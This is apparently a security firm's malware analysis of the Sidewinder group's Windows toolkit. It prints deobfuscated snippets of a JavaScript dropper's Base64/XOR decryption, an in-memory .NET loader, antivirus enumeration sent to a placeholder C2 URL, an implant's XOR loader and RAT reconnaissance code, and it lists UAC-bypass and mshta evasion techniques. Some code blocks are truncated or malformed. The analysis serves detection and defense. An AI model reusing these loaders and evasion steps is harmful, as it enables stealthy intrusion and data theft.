Exposing Sidewinder’s Arsenal against Windows


While chasing the spear-phishing campaigns carried out in the South-Asian region by the well-known threat activity group “Sidewinder” (a.k.a Rattlesnake, T-APT-04), Ebryx research team witnessed the evolution of Sidewinder’s tactics and arsenal as it made attempts to evade detection and achieve its operational objectives. Sidewinder’s tools of choice for targeting Windows based machines primarily consist of three malware strains that we identify as SNAKEBITE – a JavaScript-based dropper, MEMFANG – an in-memory implant, and S-VENOM – a RAT used by Sidewinder for accessing compromised Windows machines.


SNAKEBITE is a JavaScript based dropper that is not unique in nature instead an amalgam of a custom decryption technique and open-source offensive tools. The part that consists of open-source tools is a modified Starfighters implementation of Koadic (an information gathering implant to perform post-exploitation reconnaissance on the victim machine) to load the payload in-memory.

Majority of the code in SNAKEBITE is obscured and encrypted via customized encryption. The decryption sequence consists of Base64 decode followed by XOR – the key for which is calculated at the time of execution. Primarily, an embedded phrase is decoded using Base64 and XORed with another embedded string. The resulting key is stored in the variable “keeee” and is used as the XOR decryption key for the rest of the payload. The aforementioned sequence is continued for every encrypted string which ultimately unravels the assembly payload embedded within the script.

function qdeH(str) {
	var b64 = "qfU3vnNPFuaV8WcilGXYm0Rg2ASLM1HIkjKxJhwd7OZy6toz5Eep4rDbsTBQC9+/=";
	var b, result = "",
		r1, r2, i = 0;
	for (; i < str.length;) {
		b = b64.indexOf(str.charAt(i++)) << 18 | b64.indexOf(str.charAt(i++)) << 12 |
			(r1 = b64.indexOf(str.charAt(i++))) << 6 | (r2 = b64.indexOf(str.charAt(i++)));

		result += r1 === 64 ? QpmXHA(b >> 16 & 255) :
			r2 === 64 ? QpmXHA(b >> 16 & 255, b >> 8 & 255) :
			QpmXHA(b >> 16 & 255, b >> 8 & 255, b & 255);
	return result;
function QeTPECI (key, bytes){
	var res = [];
	for (var i = 0; i < bytes.length; ) {
		for (var j = 0; j < key.length; j++) {
			res.push(QpmXHA((bytes.charCodeAt(i)) ^ key.charCodeAt(j)));
			if (i >= bytes.length) {
				j = key.length;
	return res.join("")
function PMKDTYDd(bsix){
	return QeTPECI(keeee,qdeH(bsix))
var keeee = QeTPECI("dDsB",qdeH("mdn"+"n1n"+"Wbl"+"Pu1"));

Snippet 1: The Base64 and XOR decryption sequence

SNAKEBITE utilizes Starfighters (an in-memory launcher that has also been included in the Koadic framework as an implant) to deploy the MEMFANG implant directly into memory. The modified payload is a .NET assembly converted to javascript using DotNetToJScript.

var dash = "";
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc["GetByteCount_2"](b);
var ba = enc["GetBytes_4"](b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform["TransformFinalBlock"](ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
dash = ms;

var so = <payload>

var stm = Func4(so.split(".").join(''));
var fmt = new ActiveXObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter");
var al = new ActiveXObject("System.Collections.ArrayList");
var d = fmt["Deserialize_2"](dash);
var o = d["DynamicInvoke"](al.ToArray())["CreateInstance"](ec);

Snippet 2: Deobfuscated Starfighters snippet from a variant of SNAKEBITE

Starfighters implementation in SNAKEBITE requires setting the .NET version before execution which is achieved by checking for the subfolders in .NET installation directory using FSO.GetFolder(FSO.GetSpecialFolder(0)+”\Microsoft.NET\Framework\”).SubFolders;. Once the .NET version is set, information regarding the installed Antivirus product is collected by querying the WMI service and later sent to the C2 server.

var objWMIService = GetObject(“winmgmts:\\.\root\SecurityCenter2”);
var colItems = objWMIService.ExecQuery(“Select * From AntiVirusProduct”, null, 48);

var shells = new ActiveXObject("WScript.Shell");
function MfNZUM(){
    var net = "";
    var FSO = new ActiveXObject("Scripting.FileSystemObject");
    var folds = FSO.GetFolder(FSO.GetSpecialFolder(0)+"\Microsoft.NET\Framework\ ").SubFolders;
    e = new Enumerator(folds);
    var folder;
    while (e.atEnd() == false)  
        folder = e.item();
        var files = folder.files;
        var fileEnum = new Enumerator(files);
        while(fileEnum.atEnd() == false){
            if(fileEnum.item().Name == "csc.exe")
                    return "v2.0.50727";
                else if(folder.Name.substring(0,2)=="v4")
                    return "v4.0.30319";
    return folder.Name;
ver = v2.0.50727;
try {
    ver = MfNZUM();
} catch(e) { 
    ver = "v2.0.50727";
shells.Environment("Process")(COMPLUS_Version) = ver;;
var objWMIService = GetObject("winmgmts:\\.\root\SecurityCenter2");
var colItems = objWMIService.ExecQuery("Select * From AntiVirusProduct", null, 48);
var objItem = new Enumerator(colItems); 
var x = "";
for (; !objItem.atEnd(); objItem[moveNext]()) {
    x += (objItem.item().displayName + " " + objItem.item().productState).replace(" ", "");
if(x && x.length){
    x = x + "_stg1";
var aUrl = "<C2_domain>/plugins/16364/11542/true/true/"+x;
} catch (e) {}
catch (e) {}

Snippet 3: Finding installed Antivirus product, followed by a call to C2 address


MEMFANG is a .NET implant that is embedded inside SNAKEBITE and deployed directly in-memory via Starfighters. Using a DynamicInvoke call, it sideloads the DLL file to decrypt and load the payload, inside a randomly named encrypted .tmp file.

The decryption mechanism utilizes the first 32 bytes of the data in the .tmp file to perform a byte-wise XOR. This results in the decrypted assembly stored in “array2″ which is then loaded and executed in memory.

static Program()
	byte[] array = File.ReadAllBytes(Path.Combine(Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location), "LwBFLmM.tmp".Trim()));
	byte[] array2 = new byte[array.Length - 32];
	Buffer.BlockCopy(array, 32, array2, 0, array2.Length);
	for (int i = 0; i < array2.Length; i++)
		byte[] array3 = array2;
		int num = i;
		array3[num] ^= array[i % 32];
	Program._assembly = Assembly.Load(array2);

Snippet 4: MEMFANG decryption scheme to load the RAT in memory


The decrypted payload injected into memory by MEMFANG implant acts as a Remote Access Tool for the operators. The RAT, identified as S-VENOM, is modular in nature and has several functionalities to collect information from the compromised host. This collected information is relayed back to the command and control server by means of a custom-developed web client. Following information is collected by the S-VENOM post-intrusion:

Enumerate Installed Software

S-VENOM traverses over the registry key, “Software\Microsoft\Windows\CurrentVersion\Uninstall“, to find all installed applications on the system with a valid uninstallation path.

using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall"))
    foreach (string name in registryKey.GetSubKeyNames())
        using (RegistryKey registryKey2 = registryKey.OpenSubKey(name))
	if (registryKey2 != null)
		string text = registryKey2.GetValue("DisplayName") as string;
if (text != null)

Snippet 5: Traversing the registry key to find installed software

Identify Security Solutions

Using the Windows Management Instrumentation (WMI) framework, S-VENOM attempts to enumerate all operating Antivirus and Antispyware products on the system.

SysInfo.WriteWmi(jsonWriter, "antiVirusProduct", "root\\SecurityCenter2", new string[]
SysInfo.WriteWmi(jsonWriter, "antiSpywareProduct", "root\\SecurityCenter2", new string[]

Snippet 6: Using WMI to find installed Antivirus product

Retrieve Access Tokens

Using the GetTokenInformation API call from advapi32.dll, the tool returns in-depth information about each access token on the system.

Gather System Information

Apart from collecting information about Security Solutions, S-VENOM is also capable of collecting identifying information about the compromised host using WMI classes such as Win32_UserAccount, Win32_ComputerSystem, Win32_Process, Win32_OperatingSystem, Win32_TimeZone, and others.

Enumerate Disks

S-VENOM enumerates all available disks along with collection of data such as free and used space, its label, and the formatting of the drive. Once collected, it begins enumerating folders and files inside each drive and their creation-access-modification times for exfiltration.

Gather Network Information

S-VENOM collects network information from all available interfaces using the GetAllNetworkInterfaces call. Collected data includes MAC addresses, DNS servers, gateways, speeds, DHCP servers, and operational status of each interface.

Tactics, Techniques and Procedures


EnterpriseT1047Windows Management InstrumentationSnakebite makes use of Windows Management Instrumentation (WMI) Service to collect information regarding the installed antivirus and its version on the victim machine
EnterpriseT1059.007JavaScriptSnakebite is completely JavaScript based and creates a window with (-1000,-1000) to hide itself from the visible screen
EnterpriseT1574.002DLL Side-LoadingSnakebite performs DLL-Sideloading to inject the MEMFANG implant inside memory of an elevated process
EnterpriseT1548.002Bypass User Access ControlSnakebite uses rekeywiz.exe or credwiz.exe to perform UAC bypass
EnterpriseT1140Deobfuscate /Decode Files or InformationSnakebite implements heavy obfuscation through a combination of Base64 and XOR to evade defense mechanisms and to slow down forensics. All JavaScript code is deobfuscated at runtime
EnterpriseT1218.005MshtaSnakebite makes use of Windows’ own signed binary mshta.exe to run its JavaScript code as an .HTA file in order to bypass application whitelisting
EnterpriseT1083Files and Directory DiscoverySnakebite checks for the Windows binary csc.exe in \Microsoft.NET\Framework\ to guess the installed .NET version and set the environment for the execution through WScript
EnterpriseT1518.001Security Software DiscoverySnakebite checks for the installed antivirus and its version to craft a GET HTTP request in order to retrieve stage-2 payload
EnterpriseT1132Data Encoding: Standard EncodingSnakebite encodes key information about the system and exfiltrates it through the embedded C&C URL
EnterpriseT1071.001Application Layer Protocol: Web ProtocolsSnakebite uses the HTTP protocol to send GET requests to the C&C server. This request is intended to download the next payload and inform the C2 about target environment


EnterpriseT1055Process InjectionMEMFANG injects the on-disk encrypted payload into the memory address space of the calling process
EnterpriseT1140Deobfuscate/Decode Files or InformationMEMFANG deobfuscates the RAT and injects it directly into the memory


EnterpriseT1005Data From Local SystemS-VENOM collects data from the local system by enumerating drives and folders, while filtering them based on a set of extensions for exfiltration
EnterpriseT1119Automated CollectionS-VENOM automates the collection process by enumerating WMI classes and pushing data to a file buffer for exfiltration
EnterpriseT1041Exfiltration over C2 ChannelS-VENOM exfiltrates data to the existing C2 channel after collection and updates its configuration periodically


The current arsenal of Sidewinder against the Windows based systems indicates their heavy utilization of open-source offensive tools and latest vulnerabilities or POCs shared by Google Project Zero. Koadic framework has also reportedly been used by other advanced threat activity groups like MuddyWater and APT28.

SideWinder’s continued usage of open-source tooling points to two potential scenarios; conservation of resources by using open-source tools despite public coverage and detection or an intentional effort to make attribution hard for defenders.

Coverage of the techniques implemented by such malware can significantly improve detection of similar intrusions and allow blue-teams to respond to threats that really matter contrary to chasing compliance checks or IOCs.

More From My Blog

    Cybersecurity ServicesCloud SecuritySecurity Assessment ServicesTailored Security for StartupsTailored Security for StartupsSecurity R&DDetection and Response ServicesCustom EngineeringManaged SOCOtherIncident Readiness and Response

      Cybersecurity ServicesCloud SecuritySecurity Assessment ServicesTailored Security for StartupsTailored Security for StartupsSecurity R&DDetection and Response ServicesCustom EngineeringManaged SOCOtherIncident Readiness and Response

        Cybersecurity ServicesCloud SecuritySecurity Assessment ServicesTailored Security for StartupsTailored Security for StartupsSecurity R&DDetection and Response ServicesCustom EngineeringManaged SOCOtherIncident Readiness and Response

          Cybersecurity ServicesCloud SecuritySecurity Assessment ServicesTailored Security for StartupsTailored Security for StartupsSecurity R&DDetection and Response ServicesCustom EngineeringManaged SOCOtherIncident Readiness and Response

          Get In Touch